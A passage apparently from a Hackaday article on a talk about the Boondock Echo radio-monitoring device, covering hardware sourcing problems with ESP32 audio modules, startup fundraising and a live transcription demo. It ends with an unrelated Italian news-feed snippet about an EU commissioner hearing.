The hope was to start producing and delivering Boondock Echo devices. Of course, nobody is immune to production hell, and it was no different for this team. KC dives into the story of how the device relied on the ESP32-A1S module. When they went to make more, this turned out to be problematic. They found some of the purchased modules worked and some didn’t. Stripping the RF shields off the pre-baked modules, they found that while they all included audio codec chips marked “8388,” some modules had a different layout and functioned differently. And these were parts with FCC IDs, identical part numbers, and everything! This turned into a huge mess that derailed the project for some time. The project had to be retooled to work with the ESP32-based AI Thinker Audio Kit, to which they added a custom “sidekick” board to handle interfacing with the desired radio hardware.Dodgy parts caused a great deal of trouble for the team.
Mark notes that there were some organizational lessons learned through this difficult journey. He talks about the value of planning and budgets when it comes to any attempt to escape the “Valley of Death” as a nascent startup. Mark also explains how Boondock Echo came to seek investors to grow further when he realized they didn’t have the resources to make it on their own.
“You don’t go out asking for $10,000 from family and friends, you go out and you ask for a heck of a lot more than that from professional investors,” explains Mark. “It’s a lot easier to come up with $100,000 than $10,000, because the venture capitalists don’t play in the $10,000 price range.” Of course, he notes that this comes with a tradeoff—investors want a stake in the company in exchange for cold, hard cash. Moving to this mode of operation involved creating a company and then dividing up shares for all the relevant stakeholders—a unique challenge of its own. Mark and KC explain how they handled the growing pains and grew their team from there.The successful live demo was a moment of some joy. It used a modified Supercon badge to display transcription of an audio message captured by a Boondock Echo device.
The rest of the talk covers the product itself, and we get a demo of what it can do. KC and Mark show us how the Boondock Echo units capture audio, record it, and submit it to the cloud. From there, we get to see how things like AI transcription, keyword triggers, and notifications work, and there’s even a fun live demo. Beyond that, Mark explains how you can order the hardware via CrowdSupply, and sign up with the Boondock Echo cloud service.
It’s not just neat to see a cool project, it’s neat to see something like this grow from an idea into a fully-fledged business. Even better, it grew out of the Hackaday community itself, and has flourished from there. It’s a wonderful testament to what hackers can achieve with a good idea and the will to pursue it.
Tre spunti dall’audizione del candidato commissario per la Difesa e lo Spazio. L’analisi di Nones
@Notizie dall'Italia e dal mondo
[quote]Il candidato Commissario europeo a Difesa e Spazio, Andrius Kubilius, è stato sentito dalle Commissioni per gli affari esteri e per l’industria, la ricerca e l’energia del Parlamento europeo in vista delle votazioni sulla
Notizie dall'Italia e dal mondo reshared this.